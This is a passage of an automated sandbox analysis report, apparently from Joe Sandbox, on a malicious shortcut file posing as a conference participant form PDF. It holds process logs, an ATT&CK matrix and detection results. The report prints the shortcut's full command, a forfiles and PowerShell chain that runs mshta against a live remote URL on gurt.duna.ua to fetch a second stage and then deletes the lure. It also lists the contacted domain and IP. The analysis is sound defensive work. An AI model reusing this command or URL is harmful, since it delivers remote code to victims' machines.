Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: T15hf0Y3mp.lnkLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior

Boot Survival

barindex
Powershell creates an autostart link
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk';del $eCRg@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powershell','unit testing','bdd','tdd','mocking') # The web address of an icon which can be used in galleries to represent this module IconUri = "http://pester
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4247Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3596Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7452Thread sleep count: 4247 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456Thread sleep count: 3596 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7424Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7868Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C0554D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2953865765.000001FF75053000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: mshta.exe, 00000003.00000002.2951889230.0000017C05585000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWl
Source: svchost.exe, 00000005.00000002.2952387664.000001FF6FA2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWpu
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\mshta.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Jump to behavior
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "c:\windows\system32\forfiles.exe" /p c:\ /m windows /c "powershell . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/gieannualconferencestage2;$ecrg = get-location;$ecrg = join-path $ecrg 'gie annual conference 2024 in munich participant form event agency.pdf.lnk';del $ecrg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Command and Scripting Interpreter		1
Registry Run Keys / Startup Folder		11
Process Injection		11
Masquerading		OS Credential Dumping11
Security Software Discovery		Remote Services1
Email Collection		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell		1
DLL Side-Loading		1
Registry Run Keys / Startup Folder		1
Disable or Modify Tools		LSASS Memory11
Process Discovery		Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		31
Virtualization/Sandbox Evasion		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials22
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
T15hf0Y3mp.lnk16%ReversingLabsWin32.Trojan.Generic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://g.live.com/odclientsettings/Prod.C:0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b60%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://schema.org0%URL Reputationsafe
http://gmpg.org/xfn/110%URL Reputationsafe
https://yoast.com/wordpress/plugins/seo/0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
gurt.duna.ua
185.68.16.189
truetrue
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7false
      		unknown
      https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/select_radio_check/css/html_types/select_radio_check.css?ver=1.3.4.2false
        		unknown
        https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=2.3.8false
          		unknown
          https://gurt.duna.ua/wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-contact-form-7-tracker.js?ver=1.13.1false
            		unknown
            https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=1false
              		unknown
              https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/radio.css?ver=1.3.4.2false
                		unknown
                https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2true
                  		unknown
                  https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_instock/css/by_instock.css?ver=1.3.4.2false
                    		unknown
                    https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/tooltip.css?ver=1.3.4.2false
                      		unknown
                      https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_author/css/by_author.css?ver=1.3.4.2false
                        		unknown
                        https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5false
                          		unknown
                          https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2false
                            		unknown
                            https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/color.css?ver=1.3.4.2false
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://gurt.duna.ua/my-account/lost-password/mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=12mshta.exe, 00000003.00000003.1823768527.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933398840.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823556487.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953388040.00000184077C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.17.57KJdmshta.exe, 00000003.00000002.2951889230.0000017C05585000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2.cssmshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff?v=3.17.5)mshta.exe, 00000003.00000002.2951889230.0000017C0554D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=1a392523165907adee6aRmshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=1DSC:mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823904965.0000017C055E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://gurt.duna.ua/programy-nauczania/GIEApowershell.exe, 00000002.00000002.1731496106.0000022601701000.00000004.00000800.00020000.00000000.sdmptrue
